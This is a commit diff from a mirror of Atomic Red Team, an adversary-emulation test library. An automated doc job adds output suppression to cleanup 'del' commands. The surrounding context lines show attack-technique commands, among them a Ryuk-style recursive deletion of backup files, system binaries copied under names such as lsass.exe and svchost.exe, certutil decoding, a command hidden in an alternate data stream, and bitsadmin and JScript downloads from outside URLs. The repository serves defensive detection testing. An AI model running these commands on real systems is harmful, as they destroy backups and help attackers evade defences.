security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-10 23:06:25 +00:00
parent 3fa4dd1c9e
commit 2f778f359e
20 changed files with 92 additions and 92 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1036/T1036.md
+6 -6
View File
@@ -54,7 +54,7 @@ cmd.exe /c %SystemRoot%\Temp\lsass.exe
#### Cleanup Commands:
```
del /Q /F %SystemRoot%\Temp\lsass.exe
del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
```
@@ -100,7 +100,7 @@ cmd.exe /c %APPDATA%\notepad.exe /B
#### Cleanup Commands:
```
del /Q /F %APPDATA%\notepad.exe
del /Q /F %APPDATA%\notepad.exe >nul 2>&1
```
@@ -125,7 +125,7 @@ cmd.exe /c %APPDATA%\svchost.exe /B
#### Cleanup Commands:
```
del /Q /F %APPDATA%\svchost.exe
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
```
@@ -150,7 +150,7 @@ cmd.exe /K %APPDATA%\taskhostw.exe
#### Cleanup Commands:
```
del /Q /F %APPDATA%\taskhostw.exe
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
```
@@ -252,8 +252,8 @@ C:\lsm.exe /c echo T1036 > C:\T1036.txt
#### Cleanup Commands:
```
del C:\T1036.txt
del C:\lsm.exe
del C:\T1036.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
```
atomics/T1038/T1038.md
+2 -2
View File
@@ -35,8 +35,8 @@ copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
#### Cleanup Commands:
```
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
```
atomics/T1055/T1055.md
+2 -2
View File
@@ -204,8 +204,8 @@ C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
#### Cleanup Commands:
```
del C:\T1055.txt
del C:\svchost.exe
del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
```
atomics/T1064/T1064.md
+1 -1
View File
@@ -59,7 +59,7 @@ C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
#### Cleanup Commands:
```
del #{script_to_create}
del #{script_to_create} >nul 2>&1
```
atomics/T1071/T1071.md
+1 -1
View File
@@ -253,7 +253,7 @@ cscript //E:Jscript #{script_file}
#### Cleanup Commands:
```
del #{script_file} /F /Q
del #{script_file} /F /Q >nul 2>&1
```
atomics/T1100/T1100.md
+1 -1
View File
@@ -33,7 +33,7 @@ xcopy #{web_shells} #{web_shell_path}
#### Cleanup Commands:
```
del #{web_shell_path}
del #{web_shell_path} >nul 2>&1
```
atomics/T1102/T1102.md
+1 -1
View File
@@ -31,7 +31,7 @@ bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsa
#### Cleanup Commands:
```
del %TEMP%\bitsadmindownload.html
del %TEMP%\bitsadmindownload.html >nul 2>&1
```
atomics/T1105/T1105.md
+2 -2
View File
@@ -331,8 +331,8 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q
del AtomicTestFileT1105.js /Q
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
```
atomics/T1107/T1107.md
+1 -1
View File
@@ -122,7 +122,7 @@ Delete a single file from the temporary directory using cmd.exe
#### Attack Commands: Run with `command_prompt`!
```
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
```
atomics/T1114/T1114.md
+1 -1
View File
@@ -38,7 +38,7 @@ powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox
#### Cleanup Commands:
```
del #{output_file}
del #{output_file} >nul 2>&1
```
atomics/T1115/T1115.md
+1 -1
View File
@@ -35,7 +35,7 @@ clip < %temp%\T1115.txt
#### Cleanup Commands:
```
del %temp%\T1115.txt
del %temp%\T1115.txt >nul 2>&1
```
atomics/T1119/T1119.md
+4 -4
View File
@@ -103,10 +103,10 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
#### Cleanup Commands:
```
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
del %TEMP%\T1119_1.txt >nul 2>&1
del %TEMP%\T1119_2.txt >nul 2>&1
del %TEMP%\T1119_3.txt >nul 2>&1
del %TEMP%\T1119_4.txt >nul 2>&1
```
atomics/T1121/T1121.md
+3 -3
View File
@@ -34,7 +34,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
#### Cleanup Commands:
```
del #{file_name}
del #{file_name} >nul 2>&1
```
@@ -80,8 +80,8 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
#### Cleanup Commands:
```
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
del #{file_name} >nul 2>&1
del key.snk >nul 2>&1
```
atomics/T1140/T1140.md
+4 -4
View File
@@ -37,8 +37,8 @@ certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
#### Cleanup Commands:
```
del %temp%\T1140_calc.txt
del %temp%T1140_calc_decoded.exe
del %temp%\T1140_calc.txt >nul 2>&1
del %temp%T1140_calc_decoded.exe >nul 2>&1
```
@@ -68,8 +68,8 @@ copy %windir%\system32\certutil.exe %temp%\tcm.tmp
#### Cleanup Commands:
```
del %temp%\tcm.tmp
del %temp%\T1140.txt
del %temp%\tcm.tmp >nul 2>&1
del %temp%\T1140.txt >nul 2>&1
```
atomics/T1145/T1145.md
+1 -1
View File
@@ -37,7 +37,7 @@ dir c:\ /b /s .key | findstr /e .key
#### Cleanup Commands:
```
del c:\Windows\cert.key
del c:\Windows\cert.key >nul 2>&1
```
atomics/T1158/T1158.md
+3 -3
View File
@@ -100,7 +100,7 @@ attrib.exe +s %TEMP%\T1158.txt
#### Cleanup Commands:
```
del /A:S %TEMP%\T1158.txt
del /A:S %TEMP%\T1158.txt >nul 2>&1
```
@@ -125,7 +125,7 @@ attrib.exe +h %TEMP%\T1158_hidden.txt
#### Cleanup Commands:
```
del /A:H %TEMP%\T1158_hidden.txt
del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
```
@@ -231,7 +231,7 @@ for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
#### Cleanup Commands:
```
del #{file_name}
del #{file_name} >nul 2>&1
```
atomics/T1197/T1197.md
+1 -1
View File
@@ -40,7 +40,7 @@ bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_fi
#### Cleanup Commands:
```
del #{local_file}
del #{local_file} >nul 2>&1
```
atomics/T1485/T1485.md
+1 -1
View File
@@ -167,7 +167,7 @@ Deletes backup files in a manner similar to Ryuk ransomware.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
```
atomics/T1500/T1500.md
+1 -1
View File
@@ -32,7 +32,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{in
#### Cleanup Commands:
```
del #{output_file}
del #{output_file} >nul 2>&1
```
atomics/index.yaml
+55 -55
View File
@@ -773,7 +773,7 @@ persistence:
#{local_file}
'
cleanup_command: 'del #{local_file}
cleanup_command: 'del #{local_file} >nul 2>&1
'
- name: Download & Execute via PowerShell BITS
@@ -1356,8 +1356,8 @@ persistence:
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
T1519:
technique:
x_mitre_permissions_required:
@@ -1622,7 +1622,7 @@ persistence:
command: |
echo T1158 > %TEMP%\T1158.txt
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
- name: Create Windows Hidden File with Attrib
@@ -1637,7 +1637,7 @@ persistence:
command: |
echo T1158_hidden > %TEMP%\T1158_hidden.txt
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
- name: Hidden files
@@ -1710,7 +1710,7 @@ persistence:
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name}
cleanup_command: 'del #{file_name} >nul 2>&1
'
- name: Create ADS PowerShell
@@ -4967,7 +4967,7 @@ persistence:
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
T1084:
@@ -5517,7 +5517,7 @@ defense-evasion:
#{local_file}
'
cleanup_command: 'del #{local_file}
cleanup_command: 'del #{local_file} >nul 2>&1
'
- name: Download & Execute via PowerShell BITS
@@ -6221,7 +6221,7 @@ defense-evasion:
#{input_file}
'
cleanup_command: 'del #{output_file}'
cleanup_command: 'del #{output_file} >nul 2>&1'
T1223:
technique:
x_mitre_data_sources:
@@ -6737,8 +6737,8 @@ defense-evasion:
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
T1073:
technique:
x_mitre_data_sources:
@@ -6883,8 +6883,8 @@ defense-evasion:
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
cleanup_command: |
del %temp%\T1140_calc.txt
del %temp%T1140_calc_decoded.exe
del %temp%\T1140_calc.txt >nul 2>&1
del %temp%T1140_calc_decoded.exe >nul 2>&1
- name: Certutil Rename and Decode
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
@@ -6904,8 +6904,8 @@ defense-evasion:
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
cleanup_command: |
del %temp%\tcm.tmp
del %temp%\T1140.txt
del %temp%\tcm.tmp >nul 2>&1
del %temp%\T1140.txt >nul 2>&1
T1089:
technique:
x_mitre_data_sources:
@@ -7427,7 +7427,7 @@ defense-evasion:
elevation_required: false
command: |
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
- name: Delete an entire folder - Windows cmd
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
@@ -8270,7 +8270,7 @@ defense-evasion:
command: |
echo T1158 > %TEMP%\T1158.txt
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
- name: Create Windows Hidden File with Attrib
@@ -8285,7 +8285,7 @@ defense-evasion:
command: |
echo T1158_hidden > %TEMP%\T1158_hidden.txt
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
- name: Hidden files
@@ -8358,7 +8358,7 @@ defense-evasion:
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name}
cleanup_command: 'del #{file_name} >nul 2>&1
'
- name: Create ADS PowerShell
@@ -9368,7 +9368,7 @@ defense-evasion:
command: |
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
- name: Masquerading as Linux crond process.
@@ -9397,7 +9397,7 @@ defense-evasion:
command: |
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
'
- name: Masquerading - wscript.exe running as svchost.exe
@@ -9413,7 +9413,7 @@ defense-evasion:
command: |
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe /B
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
'
- name: Masquerading - powershell.exe running as taskhostw.exe
@@ -9429,7 +9429,7 @@ defense-evasion:
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
'
- name: Masquerading - non-windows exe running as windows exe
@@ -9504,8 +9504,8 @@ defense-evasion:
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036 > C:\T1036.txt
cleanup_command: |
del C:\T1036.txt
del C:\lsm.exe
del C:\T1036.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
T1112:
technique:
x_mitre_data_sources:
@@ -10899,8 +10899,8 @@ defense-evasion:
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
cleanup_command: |
del C:\T1055.txt
del C:\svchost.exe
del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
T1121:
technique:
x_mitre_data_sources:
@@ -10990,7 +10990,7 @@ defense-evasion:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
cleanup_command: 'del #{file_name}
cleanup_command: 'del #{file_name} >nul 2>&1
'
- name: Regsvs Uninstall Method Call Test
@@ -11027,8 +11027,8 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
del #{file_name} >nul 2>&1
del key.snk >nul 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -11587,7 +11587,7 @@ defense-evasion:
command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute}
> #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create}
\n"
cleanup_command: 'del #{script_to_create}
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
T1218:
@@ -12484,7 +12484,7 @@ defense-evasion:
%TEMP%\bitsadmindownload.html
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
- name: Reach out to C2 Pointer URLs via powershell
@@ -13655,8 +13655,8 @@ privilege-escalation:
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
T1519:
technique:
x_mitre_permissions_required:
@@ -14902,8 +14902,8 @@ privilege-escalation:
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
cleanup_command: |
del C:\T1055.txt
del C:\svchost.exe
del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
T1053:
technique:
x_mitre_permissions_required:
@@ -15608,7 +15608,7 @@ privilege-escalation:
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
impact:
@@ -15893,7 +15893,7 @@ impact:
name: command_prompt
elevation_required: true
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
'
'':
@@ -21071,7 +21071,7 @@ credential-access:
command: |
echo "ATOMICREDTEAM" > %windir%\cert.key
dir c:\ /b /s .key | findstr /e .key
cleanup_command: 'del c:\Windows\cert.key
cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
'
- name: Discover Private SSH Keys
@@ -22704,7 +22704,7 @@ execution:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
cleanup_command: 'del #{file_name}
cleanup_command: 'del #{file_name} >nul 2>&1
'
- name: Regsvs Uninstall Method Call Test
@@ -22741,8 +22741,8 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
del #{file_name} >nul 2>&1
del key.snk >nul 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -23362,7 +23362,7 @@ execution:
command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute}
> #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create}
\n"
cleanup_command: 'del #{script_to_create}
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
T1035:
@@ -25853,8 +25853,8 @@ lateral-movement:
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q
del AtomicTestFileT1105.js /Q
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
T1077:
technique:
@@ -26375,10 +26375,10 @@ collection:
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
cleanup_command: |-
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
del %TEMP%\T1119_1.txt >nul 2>&1
del %TEMP%\T1119_2.txt >nul 2>&1
del %TEMP%\T1119_3.txt >nul 2>&1
del %TEMP%\T1119_4.txt >nul 2>&1
T1115:
technique:
x_mitre_data_sources:
@@ -26437,7 +26437,7 @@ collection:
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
'
- name: PowerShell
@@ -26752,7 +26752,7 @@ collection:
-file #{output_file}
'
cleanup_command: 'del #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
T1056:
@@ -28230,8 +28230,8 @@ command-and-control:
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q
del AtomicTestFileT1105.js /Q
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
T1071:
technique:
@@ -28474,7 +28474,7 @@ command-and-control:
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
T1032:
@@ -28868,7 +28868,7 @@ command-and-control:
%TEMP%\bitsadmindownload.html
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
- name: Reach out to C2 Pointer URLs via powershell